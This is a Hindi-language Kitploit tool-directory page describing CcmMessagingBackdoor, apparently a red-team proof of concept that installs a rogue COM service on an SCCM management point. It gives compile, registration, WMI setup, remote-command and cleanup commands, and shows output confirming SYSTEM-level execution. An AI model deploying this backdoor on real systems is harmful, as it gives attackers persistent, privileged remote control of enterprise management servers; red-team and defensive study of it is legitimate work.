Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CcmMessagingBackdoor — SCCM प्रबंधन बिंदु के लिए प्रूफ-ऑफ-कॉन्सेप्ट बैकडोर जो SYSTEM के रूप में स्थायी दूरस्थ कमांड निष्पादन के लिए दुष्ट COM सेवा का उपयोग करता है। | Kitploit
उपकरण/GitHubGitHub/synacktiv/ccmmessagingbackdoor
स्थायित्व तंत्रपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

SCCM प्रबंधन बिंदु के लिए प्रूफ-ऑफ-कॉन्सेप्ट बैकडोर जो SYSTEM के रूप में स्थायी दूरस्थ कमांड निष्पादन के लिए दुष्ट COM सेवा का उपयोग करता है।

रिपॉजिटरी देखें
1921 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CcmMessagingBackdoor

प्रबंधन बिंदु (Management Point) पर पहुँच बनाए रखने के लिए एक दुष्ट CcmMessaging सेवा बनाने तथा स्थापित करने हेतु Proof of Concept टूलिंग।

उपयोग

  • प्रबंधन बिंदु पर दुष्ट COM सेवा संकलित करें और स्थापित करें
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • WMI में सेवा एंडपॉइंट कॉन्फ़िगर करें
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Python क्लाइंट का उपयोग करके PowerShell कमांड चलाएँ
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • सफाई के लिए
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • CcmExec प्रक्रिया के यादृच्छिक क्रैश को ठीक करें (कारण अभी अज्ञात है)
टूल डाउनलोड करें